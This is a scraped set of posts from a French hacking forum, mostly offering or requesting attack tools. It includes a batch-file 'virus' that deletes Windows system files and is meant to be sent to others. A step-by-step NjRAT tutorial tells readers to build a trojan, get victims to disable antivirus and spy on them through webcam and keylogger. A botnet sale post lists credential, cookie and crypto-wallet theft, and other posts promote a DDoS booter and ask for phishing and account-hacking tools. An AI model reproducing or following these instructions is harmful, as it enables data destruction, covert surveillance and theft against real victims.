[TUTO] Créer votre propre virus<sep>TUTO créer vous meme votre propre virus qui peux détruire carément le PC donc ne soyez pas con évité de lexecuter sur votre PC mdr.Exemple ce code ce code détruit votre ordi donc ne lexecutez pas sa le détruit pas vraiment sa détruit le system dexplotation :@echo offdel C:\windows\pchealth\del C:\windows\system\del C:\windows\system32\restore\del winlogon.exedel C:\windows\system32\autoexec.ntEn gros si vous navez pas trop compris del veux dire delete = supprimertous ce que vous voulez que votre virus supprime vous mettez donc sa peux bien détruire ton PC qui sera sous la couette en PLS :@echo offdel Le chemin des fichier ou autre que vous voulez suppr           et en dessous vous refaite pareil : del  del  etc...Bon après vous vous doutez bien ce quil faut faire  :allez dans :FichierEregistrer sousMarquez le nom de commet vous voulez appelez votre fichier et rajoutez .batTous les fichiersEnregistrerVotre virus est fait vous avez plus qua lenvoyer.Je ne suis en aucuns cas responsable de vos erreur ou autres avec ce virus______________________________  An bèz dé groce mer  show_eval15622NoteEvaluateLessMore; 
[TUTO] Créer votre propre virus<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
Comment Spoof un E-mail sur Kali<sep>Il me sembler que les ports smtp étaient le 25  le 587 ou encore le 465 show_eval16354NoteEvaluateLessMore; 
Comment Spoof un E-mail sur Kali<sep>Tu nas pas tort  mais cest le site lui même qui conseille ce port  ______________________________  Happy horrible christmas38° 53 52 N 77° 02 12 O Kill The Childrens ec4e07263910e1b2cf71cd6fe759a82d  show_eval16357NoteEvaluateLessMore; 
H3ll0 W0RlD =)<sep>Bonjour à tousEtant depuis de nombreuses années un passionné de hacking et en ayant fais mon métier je me suis arrêté ici et jai trouvé le forum sympa. Je suis à la recherche de personne travaillant sur du cryptolocker si quelquun connait cela serait le top ______________________________  = SuperBenoit = show_eval16041NoteEvaluateLessMore; 
H3ll0 W0RlD =)<sep>Hello  oui jai grave merdé sur la section :d Ransomware  Traja06 ______________________________  = SuperBenoit = show_eval16055NoteEvaluateLessMore; 
PC pas chère pour programmer coder installer des logiciels .<sep>Salut tout le monde aujourdhui je cherche des conseilles car je conte macheter un pc portable pour coder programmer regarder des vidéos et installer des logiciels de type backtrack le moins chère possible Je cherche aussi une personne qui pourrais répondre à quelque questions en privé sur BackTrack merci davance ______________________________  Simple mais très utile :p show_eval11598NoteEvaluateLessMore; 
Probleme Darkcomet<sep>Salut jai darkcomet jai mes ports ouvert darkcomet bien configurer et tout. mais quand je créer un RAT et que je louvre sur mon PC sa marche pas : show_eval13102NoteEvaluateLessMore; 
[TUTO] Créer votre propre virus<sep>Cest techniquement un virus juste que personne au monde ne cliquera dessus. Ceci dit on peut créer un .exe qui ouvre une console qui éxécute ce code cest toujours plus lisse. . .______________________________  Ne lance pas la flèche qui se retournera contre toi show_eval15633NoteEvaluateLessMore; 
[TUTO] Créer votre propre virus<sep>  Dath wrote:  Cest techniquement un virus juste que personne au monde ne cliquera dessus. Ceci dit on peut créer un .exe qui ouvre une console qui éxécute ce code cest toujours plus lisse. . . Surtout quon peut voir le code en faisant Clique Droit > ModifierAprès oui la solution du .exe est toujours mieux que le laisser en .bat______________________________  Happy horrible christmas38° 53 52 N 77° 02 12 O Kill The Childrens ec4e07263910e1b2cf71cd6fe759a82d  show_eval15634NoteEvaluateLessMore; 
RAT<sep>Salut tt le monde jai pas mal de logiciel pour RAT comme Beast et Nanocore mais jarrive pas à gerer louverture des ports et jongler avec les IP donc jaurais besoin que qqn me fasse un tuto claire avec des screens ou que quil me fasse un partage sur Skype ^^ MadzBlind skypeMerci    ______________________________  BYE BYE show_eval13616NoteEvaluateLessMore; 
Bonjour dans ce tutoriel je vais vous apprendre a créer un serveur RAT de type NjRAT NjRAT est selon moi le logiciel le plus expérimenté en matière de trojan étant le plus optimisé en matière de connexion. De plus NjRAT est OpenSource donc...Tout dabord installez le logiciel : http://www.mediafire.com/download/n7r4q63ltnj3lc4/njRATv0.7d.rarSi votre antivirus réagit pas dinquiétude il suffit de le désinstaller Tout les logiciels de Trojan font réagir lantivirus 1 Suite a cela pour protéger votre IP rendezvous sur le site http://www.noip.com/ créez vous un compte et installez le logiciel. La création du compte est OBLIGATOIRE2 Une fois votre compte créait vous devriez arriver sur une page comme ceci : SpoilerSi ce nest pas le cas débrouillez vous pour arriver ici.Cliquez sur Add a Host puis donnez le Hostname que vous souhaitez par la suite enlevez ddns.net et remplacer le par noip.orgPar la suite ne touchez plu a rien et tout simplement cliquez sur Add Host 3 Une fois cette étape faite connectez vous sur le logiciel DUC téléchargé au préalable Noip tout les voyants seront normalement Rouge Ou auront une croix Il vous suffira dappuyer sur Edit Host et de sélectionner lhost que vous venez juste de créer Suite a cela tout les voyants se retrouveront vert.4 Il faudra par la suite ouvrir vos ports Le port 5553 cest extrêmement important que ce soit ce port ouvert et pas un autre pour cela je vous renvois a de très bon tutoriels disponible en masse sur Youtube. 5 Bon tout les préparatifs sont terminés maintenant ouvrez NjRATUne fois fait une page souvrira demandant le port que vous souhaitez utiliser marquez 5553 et cliquez sur Start 6 Ensuite cliquez sur Builder une petite page souvrira.Dans Host Mettez lhost NOIP que vous aviez créer tout a lheure Faites attention a ne faire aucune erreur dans lécriture de lhostDans Victime Name Mettez ce que vous souhaitez mais faites attention a ne pas mettre despace dans le nom ça pourrait faire bugger le logiciel. Personnellement jais tendance a laisser le nom par défaut. Par la suite ne touchez  plu a rien et cliquez sur Build Vous retrouverez si tout cest bien passé votre server sur votre Bureau que vous pouvez renommer.7 Le moment de GLOIRE envoyez le logiciel a vos ennemies Vous devrez leurs faire désactiver leur antivirus et leurs ordinateurs vous appartiendra. Vous pourrez notamment Allumer sa cam regarder son écran et faire bouger sa sourie ou même se servir du Keylogger déjà installé Vous pouvez aussi discuter avec votre victime en prenant le pseudo que vous désirez pas très discret je vous laccordeConseil : Noubliez pas de ré ouvrir DUC a chaque fois que vous allumez votre pc pour quil ny ait pas de problème. Une bonne technique pour prendre quelquun en RAT proposez a la personne de faire un TeamViewer tout amicalement  profitez en pour upload le logiciel vous même sur le pc de la victime et de lenclencher vous même la victime suite a cela ne pourra pas faire grand chose.Si jamais vous êtes vous même victime dun RAT NjRAT ou non Pour le désactiver il vous suffit de vous rendre dans votre gestionnaire des taches et de désactiver la tache liée au server.Tutoriel terminé. ______________________________  Ne lance pas la flèche qui se retournera contre toi show_eval11378NoteEvaluateLessMore; 
Mon plus gros Tuto :D<sep>Yho les Hackeurs    Dites moi bandes de gens cela vous plairait  davoir un Tuto sur : Comment Installer Kali Net Hunter Sur votre Péripherique Android ?  Non je ne parle pas que des Nexus  OnePlus One       Si oui Votez pour me montrer votre soutient   et votre envie  Car ce sera un Gros tuto    Autant en taille quen Importance     Perso je suis chaud  motivé ^^.    Alors à plus et dites moi ce que vous   voulez en MP ou Commentaires            Description    Yho    Dans ce Spoiler je vais vous expliquer   ce qui est possible de faire avec KLNet.        Un Pc Linux à Porté De Main :    Alors non cest pas une blague     Avec KLNet vous avez Vraiment un kali sur votre   Téléphone/Tablette    Car vous avez un SSH  un VNC qui est relier directement à  une Émulation de Kali       Si ça cest pas une bonne raison           Des Applications Fort Utile :     Vous avez en effet une bonne quantité dapplications et de   fonctionnalités livrées avec KLNet:            Quote:  Csploit / AndroidVNC / BlueNMEA / DriveDroid   Hackers Keyboard / NetHunter / RF Analyzer  RouterKeygen / Shodan / Terminal Emulator   USB Keyboard          Détails sur les App :    Csploit : Ceci est une applications de MITM   Très cool  bonne prise en main      AndroidVNC : Comme le nom laisse lindiquer Cest le VNC Viewer   pour Android      BlueNMEA : A ce que jai compris cest une application  GPS. Désolé je ne men suis jamais servi      DriveDroid : Ceci est une application de Booting dOS.  En bref cest comme une clé bootable mais   avec plusieurs OS.  ||  Tuto : http://www.phonandroid.com/forum/booterdesdistroslinuxviaandroidt5058      Hackers Keyboard : Ceci est un clavier android à lapparence dun   clavier dordinateur.         Nethunter : Ceci est le coeur de KLNet    Il à énormément de fonctionnalités :  USB Rubby Ducky / MITM / Payload Generator  / Lancement des Services et plein dautres          RF Analyzer : Comme son nom lindique.   Ça sert à scanner les fréquences Radios.  Mais il faut léquipement nécessaire         RouterKeygen : Ceci est une bonne application  de cracking WiFI    Très peut de WiFi sont vulnérables   mais marche Super bien             Shodan : Ceci est un petit bijoux    Cest un site web spécialisé dans la recherche   dobjets connectés pour par la suite les contrôler        Terminal Emulator : Bon comme son nom lindique.  Cest un Émulateur de Terminal Linux.   et en loccurrence cest là que Kali Linux sera utilisable.             Parce Que Cest Trop La Classe :     Bon on va pas se le cacher cest trop Badass           Voilà jespère vous avoir convaincu      Posezmoi toute vos questions je les lirais et y répondrais           Ps: /\  Votre Périphérique doit être rootable/rooter pour ce Tuto sans quoi ça sera impossible de réaliser ce tuto /\         ______________________________  Happy horrible christmas38° 53 52 N 77° 02 12 O Kill The Childrens ec4e07263910e1b2cf71cd6fe759a82d Last edited by Traja06 on Sun 30 Apr  20:03 2017; edited 2 times in total show_eval15099NoteEvaluateLessMore; 
comment hacker un comte youtube<sep>Oui mais il me semble que gmail bloque les comptes a plusieurs tentative de mots de passes échouées avec un peut de chance le bruteforce accèdera a son compte avant que le compte se bloque  show_eval14037NoteEvaluateLessMore; 
[TUTO]Le texto qui fait planter l’iPhone (iOS 8).<sep>Le texto qui plante liPhone:Cest bien une astuce malveillante quun utilisateur du site communautaire Reddit a  découverte. La chaîne de caractère suivante envoyée par un tiers  par SMS est capable déteindre à elle seule un iPhone uniquement sous iOS 8  ou bien dempêcher lapplication Messages de fonctionner correctement.Ce  plantage se produit dès que ce message saffiche sur lécran. Il  reste  néanmoins très difficile à reproduire car composé de caractères   complexes. En réalité cette chaîne de caractères spéciaux fait saturer la mémoire du téléphone qui ne parvient pas à interpréter le message.effective. Power   h   .    Comment rétablir la situation en cas « dattaque »:  Si jamais vous recevez le message plusieurs solutions soffrent à   vous pour que votre iPhone retrouve son fonctionnement normal. Si vous   avez un MacBook  vous pouvez répondre à ce texto grâce à iMessage sur  OSX. Répondre par  Siri permet également de rétablir la situation. Si la  personne vous  envoie un autre message la situation reviendra  également à la normale. Pour vous prémunir du bug et du redémarrage  intempestifs de votre  iPhone vous pouvez également désactiver les  notifications venant de  iMessage. Reste maintenant à attendre un  correctif dApple pour ne plus craindre larrivée du SMS maudit sur son  iPhone.Bonne journée  show_eval11104NoteEvaluateLessMore; 
BotNet<sep>HelloI present to your attention the longawaited botnet URIUniversal Remote InstallerThis is primarily a Trojan A program with a .exe extension that the victim gives you access to your PC.This is not RMS And the functions of Tipo include webcam or pull the mouse there is noNo knowledge in programming or special skills is neededEverything is just like in the styler  simple buttons.We pass to the functional1 Auto Backup2 Hiding from such task managers: Standard ProcessHacker ProcessMonitor PcHunter.3 Send files to a specific computer and run this file4 Send files to all the bots that are online and run this file5 Send files to all bots from a particular country6 Remote control of processes on the bot computer7 Obtaining information about the bot processor video card version. Net framework number of cores8 Obtain network information about the bot ip country city region9 Statistics bots online and graphical display Top 3 leading countries10 Bypassing Proactive Defense11 Getting a screenshot of the bot screen12 Updating the bot file to a newer one13 Run remotely on a victim computer C  commands VBscripts PowerShellcommands BATfiles14 Stealing Logins and Passwords from 8 browsers  STILLER15 Stealing Cookies files from 8 browsers16 Stealing Bitcoinfiles from Bitcoin Litecoin wallet.dat17 Performing WinAPI functions on a bot18 The identifier of the on / offline display of the bot can be seen on the network or not19 un Silient app true20 VM Detect21 Stealing files from the desktop22 Change the file extension  spoofing22 View bots statistics by country total number23 Substitution of BTC / XMR / ETH / ZEC / LTC purses26 Saving the settings for wallets and iplogger27 Fake error when starting build28 Substitution of QIWI purseHow to monetize this:Theft of accounts  and their subsequent resale or you can check it yourself I think many saw how the boys in hundreds of dollars bucks deducedSecondary account theft lets say I now have 200 botsthis is 200 logs  and at least 200 akI download the stealerI receive 200 akand spam or sell these akia week later I am a new girlfriend and stealer teki Aki VK only with changed passwordsthat is it is possible to milk more than once the same victim until it blows down the Windows because the backdoor itself is bespalevnyOr can I write a chela that he was ordered and you are a super hackerhe changes the password and you are stealing again  and you write jokes are bad with meRunning the miner  even if you do not have a FUD miner you can just manually disable the victims AntiVirus and start your minerSale of installations  here is the juice By assigning a certain number of bots infected PCs you can sell the installs. Both selectively by country and MICSIf the loadable FUD file is 9094 off it has been shown and proven in my confection and people will confirm Well this otstuk all competitors pereplyunet Also for those who do FSUs on their own and he can pass through the same traffic flow several times by the same flow of traffic.All of you know that there are such sellers. I myself do not welcome this but that is that is you can pour 5 times with 1000 bots and this is  5   80 or how much they costScrewing views of YouTube and the rest of the service on the rollup yes you can stupidly add the prog ReklamGenerator which in public register your links and run on the victims PC. and if she also has an amigo worth it then she will not feel the differenceRun RMS and then sell their IDyou can create a build RMS to run it on the victims PC and heres to you also RMSnick ready and you can sell for 20 rubles again you can in a couple of handsBy the way you can and vice versa  to take rmsnicks to load their boat on them and get access then load everything you want and then ID rms then sellWell of course you can do it all together Running your own miner  stealing logs  restealing logs  selling installs  wrapping service  starting RMS and later selling you can in a couple of hands 100500 options for implementation After all you have access to someone elses PCFree Stalk CleaningAnd a bunch of other functionsSupport from me is eternalPrice  150Contact: Telegram @Graf1313Vladimir show_eval16365NoteEvaluateLessMore; 
Quelqu'un aurai un crack de ars crypter?<sep>ok______________________________  Nous sommes Anonymous. Nous sommes Légion. Nous ne pardonnons pas. Nous noublions pas. RedouteznousSachez que ce qui est sécurisé à 99 nest pas sécuriséLife is a hackPrice show_eval12025NoteEvaluateLessMore; 
Présentation de mon site DDOS<sep>Je vous présente mon booter il sappel BootYourEnemy Si vous voulez allez voir http://bootyourenemy.esy.es/ Ma source est Horizon les prix sont vraiment bas il a 40Gbps Pour ce qui acheterons merci a vous vous aidé au développement  Un développer qui nous fera un site a nous  Un nom de domain  un API plus puissant   lt;3  lt;3 show_eval12607NoteEvaluateLessMore; 
Qui aurai un hack facebook<sep>Salut tout le monde jaimerai savoir si quelquun a un hack facebook merci davance  show_eval1275NoteEvaluateLessMore; 
[RESOLUS] Probleme Phishing<sep>Bonjour/BonsoirJe voulais vous demandez de maidez a trouvée un site qui permet de crée de faux mail pour se faire passerpour google ou je ne sais quoi dautre car je galere ;/______________________________  Bientot nouveau Forum :OLast edited by SayniHack on Wed 5 Jul  15:51 2017; edited 1 time in total show_eval15677NoteEvaluateLessMore; 
[RESOLUS] Probleme Phishing<sep>Cadeauhttp://zshadow.co show_eval15721NoteEvaluateLessMore; 
Hack Youtube<sep>  2 Solutions :PishingStealerOu Hacker Google     ______________________________  MisterMattt77 CSGO Player and virus fan.Booter utilisé : http://StresserIP.esy.es/ show_eval1677NoteEvaluateLessMore; 
Localisation: ::1:         Salut a tous  jai mis en place un serveur de clef sks dans le but de centraliser la gestion de clef pour hackbbs.   Je vais Ã©crire trois howto dans la semaine afin dexpliquer le fonctionnement de pgp. Comment crÃ©er ses clefs comment utiliser les clefs et comment utiliser un serveur sks envoyer chercher sur le serveur etc etc...   Donc a tous ceux utilisant PGP le serveur sks se trouve a :   hkp://pgp.hackbbs.org et est hebergÃ© chez moi.   de maniÃ¨re basique pour ajouter votre clefs sur le serveur :       Code:    gpg sendkeys keyserver hkp://pgp.hackbbs.org <ID>     pour chercher une clef :       Code:    gpg searchkeys keyserver hkp://subkeys.pgp.net <motif>      De mÃªme les clefs prÃ©sente dans la section seront mise en DEPRACATED non pas quelle ne soient plus valide mais simplement pour inciter a utiliser le serveur de clef sks qui prÃ©sente plus davantage que la solution classique de lÃ©change de par forum.   Inform@tiquement  Manu404
Hello  Je vous propose mon tout premier tools codÃ© a mes dÃ©but en Perl ^^ .  Il sagit de Scanport  un scanner de ports des plus basique mais nÃ©anmoins rapide  .   Voila tout est dit ^^    le code na pas Ã©tÃ© modifiÃ© depuis et prÃ©sente pas mal de laideur niveau code cest pourquoi je demanderai de ne pas me dire  utilise les ARGV ou autres  je dÃ©butai et je ne lai pas modifiÃ© volontairement  Cependant dautres remarques peuvent savÃ©rÃ© utile  je les attends.       Code:    /usr/local/bin/perl   use strict;  use warnings;  use Tk;  my fen;  fen = MainWindow>new;  fen >minsize29585;  fen > titleScanport V1 /By kmkZ ;  my texte=fen > Label text => Scanport V1 /By kmkZ > pack;       use Net::Ping;      use IO::Socket::INET;       |; pas de temporisation  print   entrer une IP cible.. : \n;  my base= <stdin>;  my p = Net::Ping>new icmp 5; dÃ©lai dattente sur le ping : 5 secondes                     my host = base;     dabord on essaye le ping          if  p>pinghost    {              print \rhost : Actif\n;  }               my @ports=212223257980107110138139143194220222143315213306522252235900666766978080; si Ã§a marche on tente une connexion sur chaque ports voulu on peu en ajouter bien sur ;        for my port @ports {          my s = IO::Socket::INET>new              PeerAddr => host              PeerPort => port              Timeout  => 2        en secondes possibilitÃ© de modifiÃ© le temps          ;          next if  s  s>connected ;          print  iÂ» port ouvert :  port\n;          close s;      }    print \n;  print  @@@@@@@@@@@@@@@@@@@\n;  print                        @BYÂ¤ KMKZ Â¤@\n;  print   @@@@@@@@@@@@@@@@@@@\n;  my bouton=fen > Button text =>   Cliquer ici pour Fermer   command => sub {exit}> pack;  MainLoop;   
Je sais que ce topic date un peu mais au passage :  Si tu veux chercher des failles ou exploit rends toi sur des sites spÃ©cialisÃ©s comme securityfocus ou packetstormsecurity.... Pour les exploits je prÃ©fÃ¨re milworm mais aprÃ¨s cest une question de goÃ»t  .   En espÃ©rant tavoir aidÃ© ...
Citation:    Jaimerais bien que ce soit terminÃ© pour fin dÃ©cembre.   Le principe est de monter un vpn entre plusieurs vm et Ã  lintÃ©rieur de ce wlan tout sera permis. Cela nous donnera plus de libertÃ© pour expÃ©rimenter diffÃ©rent type dattaque/espionage/ctf/etc...   Bref affaire en cours et jai hate que cela voit le jour Cela pourrait Ãªtre trÃ¨s interessant   Plus dinformations seront donnÃ©es quand larchitecture sera en place pour linstant ce nest encore quun prototype en cours de construction.      merci Korigan Ã§a va Ãªtre gÃ©nial